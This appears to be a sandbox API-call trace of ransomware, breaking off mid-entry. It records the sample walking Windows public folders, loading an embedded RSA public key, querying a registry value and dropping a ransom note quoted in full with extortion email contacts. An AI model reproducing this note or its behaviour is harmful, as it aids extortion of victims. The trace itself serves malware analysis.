[0140.984] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0140.984] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0140.984] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\", lpSrch="Desktop") returned 0x0 [0140.984] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0140.984] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Documents\\") returned 30 [0140.984] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0140.984] lstrcpyW (in: lpString1=0x17cf1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0140.984] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\Public\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Documents\\") returned="\\\\?\\C:\\Users\\Public\\Documents\\" [0140.984] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x844 [0140.985] Sleep (dwMilliseconds=0x96) [0141.217] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0141.217] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0141.217] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0141.217] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0141.217] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 1 [0141.217] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 0 [0141.217] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Documents" | out: lpString1="C:\\Users\\Public\\Documents") returned="C:\\Users\\Public\\Documents" [0141.217] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\Documents\\*.*") returned="C:\\Users\\Public\\Documents\\*.*" [0141.217] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\", lpSrch="Desktop") returned 0x0 [0141.217] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\", lpSrch="DESKTOP") returned 0x0 [0141.217] SetErrorMode (uMode=0x1) returned 0x1 [0141.217] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Public\\Documents\\_HELP_INSTRUCTION.TXT") returned 47 [0141.217] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0141.218] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0141.218] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x848) returned 0x0 [0141.218] RegQueryValueExW (in: hKey=0x848, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cc0218, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3cc0218*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0141.218] RegCloseKey (hKey=0x848) returned 0x0 [0141.218] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0141.218] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0141.218] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\documents\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0141.218] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\documents\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x848 [0141.218] WriteFile (in: hFile=0x848, lpBuffer=0x17a4dc*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x17a4d4, lpOverlapped=0x0 | out: lpBuffer=0x17a4dc*, lpNumberOfBytesWritten=0x17a4d4*=0x2c4, lpOverlapped=0x0) returned 1 [0141.219] CloseHandle (hObject=0x848) returned 1 [0141.219] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x3d11398 [0141.220] PathFindFileNameW (pszPath="C:\\Users\\Public\\Documents") returned="Documents" [0141.220] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Documents" | out: lpString1="Documents") returned="Documents" [0141.220] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0141.220] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0141.220] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0141.220] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0141.220] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0141.220] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0141.220] lstrcmpW (lpString1="My Music", lpString2="..") returned 1 [0141.220] lstrcmpW (lpString1="My Music", lpString2=".") returned 1 [0141.220] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\Public\\Documents" | out: lpString1="C:\\Users\\Public\\Documents") returned="C:\\Users\\Public\\Documents" [0141.220] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Documents\\") returned="C:\\Users\\Public\\Documents\\" [0141.220] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\", lpString2="My Music" | out: lpString1="C:\\Users\\Public\\Documents\\My Music") returned="C:\\Users\\Public\\Documents\\My Music" [0141.220] SetErrorMode (uMode=0x1) returned 0x1 [0141.220] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Documents\\My Music" | out: lpString1="C:\\Users\\Public\\Documents\\My Music") returned="C:\\Users\\Public\\Documents\\My Music" [0141.220] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\My Music", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Documents\\My Music\\") returned="C:\\Users\\Public\\Documents\\My Music\\" [0141.220] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Public\\Documents\\My Music\\" | out: lpString1="C:\\Users\\Public\\Documents\\My Music\\") returned="C:\\Users\\Public\\Documents\\My Music\\" [0141.220] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\My Music\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\Documents\\My Music\\*.*") returned="C:\\Users\\Public\\Documents\\My Music\\*.*" [0141.220] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Music\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0141.220] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0141.220] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Documents\\My Music" | out: lpString1="C:\\Users\\Public\\Documents\\My Music") returned="C:\\Users\\Public\\Documents\\My Music" [0141.220] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\My Music", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\Documents\\My Music\\*.*") returned="C:\\Users\\Public\\Documents\\My Music\\*.*" [0141.220] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Music\\", lpSrch="Desktop") returned 0x0 [0141.220] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Music\\", lpSrch="DESKTOP") returned 0x0 [0141.220] SetErrorMode (uMode=0x1) returned 0x1 [0141.220] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Public\\Documents\\My Music\\_HELP_INSTRUCTION.TXT") returned 56 [0141.221] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0141.221] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0141.221] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x854) returned 0x0 [0141.221] RegQueryValueExW (in: hKey=0x854, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cc0448, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x3cc0448*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0141.221] RegCloseKey (hKey=0x854) returned 0x0 [0141.221] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0141.221] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0141.221] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Music\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\documents\\my music\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0141.221] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Music\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\documents\\my music\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x854 [0141.222] WriteFile (in: hFile=0x854, lpBuffer=0x17943c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x179434, lpOverlapped=0x0 | out: lpBuffer=0x17943c*, lpNumberOfBytesWritten=0x179434*=0x2c4, lpOverlapped=0x0) returned 1 [0141.222] CloseHandle (hObject=0x854) returned 1 [0141.223] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Music\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0141.223] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0141.223] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0141.223] lstrcmpW (lpString1="My Pictures", lpString2="..") returned 1 [0141.223] lstrcmpW (lpString1="My Pictures", lpString2=".") returned 1 [0141.223] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\Public\\Documents" | out: lpString1="C:\\Users\\Public\\Documents") returned="C:\\Users\\Public\\Documents" [0141.223] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Documents\\") returned="C:\\Users\\Public\\Documents\\" [0141.223] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\", lpString2="My Pictures" | out: lpString1="C:\\Users\\Public\\Documents\\My Pictures") returned="C:\\Users\\Public\\Documents\\My Pictures" [0141.223] SetErrorMode (uMode=0x1) returned 0x1 [0141.223] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Documents\\My Pictures" | out: lpString1="C:\\Users\\Public\\Documents\\My Pictures") returned="C:\\Users\\Public\\Documents\\My Pictures" [0141.223] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\My Pictures", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Documents\\My Pictures\\") returned="C:\\Users\\Public\\Documents\\My Pictures\\" [0141.223] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Public\\Documents\\My Pictures\\" | out: lpString1="C:\\Users\\Public\\Documents\\My Pictures\\") returned="C:\\Users\\Public\\Documents\\My Pictures\\" [0141.223] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\My Pictures\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\Documents\\My Pictures\\*.*") returned="C:\\Users\\Public\\Documents\\My Pictures\\*.*" [0141.223] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Pictures\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0141.223] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0141.223] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Documents\\My Pictures" | out: lpString1="C:\\Users\\Public\\Documents\\My Pictures") returned="C:\\Users\\Public\\Documents\\My Pictures" [0141.223] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\My Pictures", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\Documents\\My Pictures\\*.*") returned="C:\\Users\\Public\\Documents\\My Pictures\\*.*" [0141.223] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Pictures\\", lpSrch="Desktop") returned 0x0 [0141.223] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Pictures\\", lpSrch="DESKTOP") returned 0x0 [0141.223] SetErrorMode (uMode=0x1) returned 0x1 [0141.223] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Public\\Documents\\My Pictures\\_HELP_INSTRUCTION.TXT") returned 59 [0141.223] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0141.224] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0141.224] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x854) returned 0x0 [0141.224] RegQueryValueExW (in: hKey=0x854, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cc0678, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x3cc0678*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0141.224] RegCloseKey (hKey=0x854) returned 0x0 [0141.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0141.224] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0141.224] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Pictures\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\documents\\my pictures\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0141.224] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Pictures\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\documents\\my pictures\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x854 [0141.224] WriteFile (in: hFile=0x854, lpBuffer=0x17943c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x179434, lpOverlapped=0x0 | out: lpBuffer=0x17943c*, lpNumberOfBytesWritten=0x179434*=0x2c4, lpOverlapped=0x0) returned 1 [0141.225] CloseHandle (hObject=0x854) returned 1 [0141.225] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Pictures\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0141.225] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0141.225] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0141.226] lstrcmpW (lpString1="My Videos", lpString2="..") returned 1 [0141.226] lstrcmpW (lpString1="My Videos", lpString2=".") returned 1 [0141.226] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\Public\\Documents" | out: lpString1="C:\\Users\\Public\\Documents") returned="C:\\Users\\Public\\Documents" [0141.226] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Documents\\") returned="C:\\Users\\Public\\Documents\\" [0141.226] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\", lpString2="My Videos" | out: lpString1="C:\\Users\\Public\\Documents\\My Videos") returned="C:\\Users\\Public\\Documents\\My Videos" [0141.226] SetErrorMode (uMode=0x1) returned 0x1 [0141.226] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Documents\\My Videos" | out: lpString1="C:\\Users\\Public\\Documents\\My Videos") returned="C:\\Users\\Public\\Documents\\My Videos" [0141.226] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\My Videos", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Documents\\My Videos\\") returned="C:\\Users\\Public\\Documents\\My Videos\\" [0141.226] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\Public\\Documents\\My Videos\\" | out: lpString1="C:\\Users\\Public\\Documents\\My Videos\\") returned="C:\\Users\\Public\\Documents\\My Videos\\" [0141.226] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\My Videos\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\Documents\\My Videos\\*.*") returned="C:\\Users\\Public\\Documents\\My Videos\\*.*" [0141.226] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Videos\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0141.226] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0141.226] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\Public\\Documents\\My Videos" | out: lpString1="C:\\Users\\Public\\Documents\\My Videos") returned="C:\\Users\\Public\\Documents\\My Videos" [0141.226] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\My Videos", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\Documents\\My Videos\\*.*") returned="C:\\Users\\Public\\Documents\\My Videos\\*.*" [0141.226] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Videos\\", lpSrch="Desktop") returned 0x0 [0141.226] StrStrW (lpFirst="C:\\Users\\Public\\Documents\\My Videos\\", lpSrch="DESKTOP") returned 0x0 [0141.226] SetErrorMode (uMode=0x1) returned 0x1 [0141.226] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\Public\\Documents\\My Videos\\_HELP_INSTRUCTION.TXT") returned 57 [0141.226] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0141.227] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0141.227] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x854) returned 0x0 [0141.227] RegQueryValueExW (in: hKey=0x854, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3cc08a8, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x3cc08a8*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0141.227] RegCloseKey (hKey=0x854) returned 0x0 [0141.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0141.227] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0141.227] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Videos\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\documents\\my videos\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0141.288] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Videos\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\public\\documents\\my videos\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x830 [0141.289] WriteFile (in: hFile=0x830, lpBuffer=0x17943c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x179434, lpOverlapped=0x0 | out: lpBuffer=0x17943c*, lpNumberOfBytesWritten=0x179434*=0x2c4, lpOverlapped=0x0) returned 1 [0141.289] CloseHandle (hObject=0x830) returned 1 [0141.290] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Videos\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0141.290] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0141.290] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0141.290] FindNextFileW (in: hFindFile=0x3d11398, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0141.290] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 1 [0141.290] FindClose (in: hFindFile=0x3d11398 | out: hFindFile=0x3d11398) returned 0 [0141.290] FindNextFileW (in: hFindFile=0x3a5550, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0141.290] lstrcmpW (lpString1="Downloads", lpString2="..") returned 1 [0141.290] lstrcmpW (lpString1="Downloads", lpString2=".") returned 1 [0141.290] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\Public" | out: lpString1="C:\\Users\\Public") returned="C:\\Users\\Public" [0141.290] lstrcatW (in: lpString1="C:\\Users\\Public", lpString2="\\" | out: lpString1="C:\\Users\\Public\\") returned="C:\\Users\\Public\\" [0141.290] lstrcatW (in: lpString1="C:\\Users\\Public\\", lpString2="Downloads" | out: 